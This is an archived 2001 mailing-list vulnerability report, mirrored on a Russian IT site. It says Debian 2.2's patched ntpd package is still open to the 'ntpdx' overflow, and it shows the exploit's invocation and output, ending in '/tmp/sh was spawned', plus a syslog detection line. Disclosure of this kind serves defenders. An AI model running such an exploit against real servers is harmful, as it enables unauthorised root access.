The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


ntpd - new Debian 2.2 (potato) version is also vulnerable


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 9 Apr 2001 11:29:15 +0200
From: Daniel Kiper <[email protected]>
To: [email protected]
Subject: ntpd - new Debian 2.2 (potato) version is also vulnerable

Hello

I have download new release of ntp package for Debian 2.2 (potato)
(Ver. 4.0.99g-2potato1).

After install I have started new version and have invoked command:

ntpq -c rl myntp

status=0664 leap_none, sync_ntp, 6 events, event_peer/strat_chg,
processor="i586", system="Linux2.2.19", leap=00, stratum=2,
precision=-17, rootdelay=49.892, rootdispersion=283.631, peer=56420,
refid=timeserver,
reftime=be7bfc52.2161d430  Mon, Apr  9 2001 11:16:02.130, poll=6,
clock=be7bfc64.0afef7c2  Mon, Apr  9 2001 11:16:20.042, state=4,
phase=-64.112, frequency=-7.643, jitter=47.294, stability=3.821

Now everything is OK.

Next command:

ntpdx -t 2 ntp

ntpdx v1.0 by [email protected]

Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)

RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
[1] <- evil query (pkt = 512 | shell = 45)
[2] <- null query (pkt = 12)
Done.
/tmp/sh was spawned.

I diden't have seen any changes in /bin/bash mode but after command:

ntpq -c rl ntp

status=0664 leap_none, sync_ntp, 6 events, event_peer/strat_chg,
processor="i586", system="M-^Pinux2.2.19", leap=00, stratum=2,
                                        ^^^^^^^^^^^^^^^^^^^ Ooops....
precision=-17, rootdelay=59.810, rootdispersion=154.661, peer=56420,
refid=timeserver,
reftime=be7bfd10.04201cd5  Mon, Apr  9 2001 11:19:12.016, poll=6,
clock=be7bfd4d.06c81d3a  Mon, Apr  9 2001 11:20:13.026, state=4,
phase=-84.368, frequency=-20.496, jitter=59.303, stability=4.202

and message from syslog

Apr  9 11:17:34 mymachine ntpd[1014]: Attempted "ntpdx" exploit from IP
x.x.x.x:1091 (possibly spoofed)

Sorry but I don't have time to check source now.

Daniel Kiper - [email protected]

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру